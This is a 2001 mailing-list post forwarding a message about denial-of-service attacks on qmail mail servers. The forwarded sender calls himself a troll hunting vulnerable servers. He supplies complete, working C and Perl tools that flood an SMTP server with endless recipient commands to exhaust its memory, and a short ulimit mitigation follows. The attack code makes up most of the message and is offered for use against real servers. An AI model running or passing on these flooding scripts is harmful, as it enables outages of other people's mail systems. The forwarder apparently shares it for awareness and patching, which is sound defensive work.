Hey all,
This was posted to the qmail list tonight...
I realize e-smith does not start qmail vi tcpserve, but I though someone
might want to look at it.
Dean
------- Forwarded message follows -------
Date sent: 01 Aug 2001 21:41:56 -0000
From: "Steve Wozniak" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Qmail, sooo easy to exploit
I'm a little Troll, I'm looking for some servers to exploit. I look
through this list to find the vulnerable qmail servers; you know,
newbies that give out tooo much info because the list regulars like
Frank Tegtmeyer beat up on newbies and pressure them to give out way
too much info.
Any of you guys ever see "your company's computer guy" on SNL? That is
some funny shit. Well you guys know who you are.
here is some code to try ya'll, once you get the info you need.
/*
* qmail-dos-2 - run a qmail system out of swap space by feeding an
infinite * amount of recipients. * * Usage: qmail-dos-2
fully-qualified-hostname * * Author: Wietse Venema. The author is
not responsible for abuse of this * program. Use at your own risk.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
void fatal(char *fmt,...)
{
va_list ap;
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
putc('\n', stderr);
exit(1);
}
chat(FILE * fp, char *fmt,...)
{
char buf[BUFSIZ];
va_list ap;
fseek(fp, 0L, SEEK_SET);
va_start(ap, fmt);
vfprintf(fp, fmt, ap);
va_end(ap);
fputs("\r\n", fp);
if (fflush(fp))
fatal("connection lost");
fseek(fp, 0L, SEEK_SET);
if (fgets(buf, sizeof(buf), fp) == 0)
fatal("connection lost");
if (atoi(buf) / 100 != 2)
fatal("%s", buf);
}
int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *hp;
char buf[BUFSIZ];
int sock;
FILE *fp;
if (argc != 2)
fatal("usage: %s host", argv[0]);
if ((hp = gethostbyname(argv[1])) == 0)
fatal("host %s not found", argv[1]);
memset((char *) &sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
sin.sin_port = htons(25); if ((sock = socket(AF_INET, SOCK_STREAM,
0)) < 0)
fatal("socket: %s", strerror(errno));
if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
fatal("connect to %s: %s", argv[1], strerror(errno));
if ((fp = fdopen(sock, "r+")) == 0)
fatal("fdopen: %s", strerror(errno));
if (fgets(buf, sizeof(buf), fp) == 0)
fatal("connection lost");
chat(fp, "mail from:<me@me>", fp);
for (;;)
chat(fp, "rcpt to:<me@%s>", argv[1]);
}
/*
------------------------------ qmail.pl ------------------------------
#!/usr/local/bin/perl -w # $Id: qmail.pl,v 1.4 1997/06/12 02:12:42
super Exp $ require 5.002; use strict; use Socket;
if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;} my $port = 25; my
$proto = getprotobyname("tcp"); my $iaddr = inet_aton($ARGV[0]) || die
"No such host: $ARGV[0]"; my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
connect(SKT, $paddr) && print("Connected established.\n") || die
"connect() $!"; send(SKT,"mail from: <me\@me>\n",0) || die "send()
$!"; my $infstr = "rcpt to: <me\@" . $ARGV[0] . ">\n";
print("Attacking..","\n"); while(<SKT>){ send(SKT,$infstr,0) || die
"send() $!"; } die "Connection lost!"; ------------------------------
qmail.pl ------------------------------ */
/* Here is the Patch for qmail -
If you are using tcpserver it should be sufficient to set the ulimit
once in the startup script. All instances of qmail-smtpd inherit the
limit without further overhead. Seems to be working fine here.
echo "Starting tcpserver for qmail-smtpd..."
ulimit -d 2048
/usr/local/bin/tcpserver -v -u 61 -g 61 0 smtp
/usr/local/bin/tcpcontrol \
/etc/tcp.smtp.cdb /var/qmail/bin/qmail-smtpd 2>&1 | \
/var/qmail/bin/splogger smtpd 3 &
*/
------- End of forwarded message -------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dean Staff
Protus IP Solutions
210 - 2379 Holly Lane
Ottawa, ON K1V 7P2 Canada
613-733-0000 ex 546 Fax 613-248-4553
e-mail: [EMAIL PROTECTED] Web: http://www.protus.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--
Please report bugs to [EMAIL PROTECTED]
Please mail [EMAIL PROTECTED] (only) to discuss security issues
Support for registered customers and partners to [EMAIL PROTECTED]
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
Archives by mail and http://www.mail-archive.com/devinfo%40lists.e-smith.org
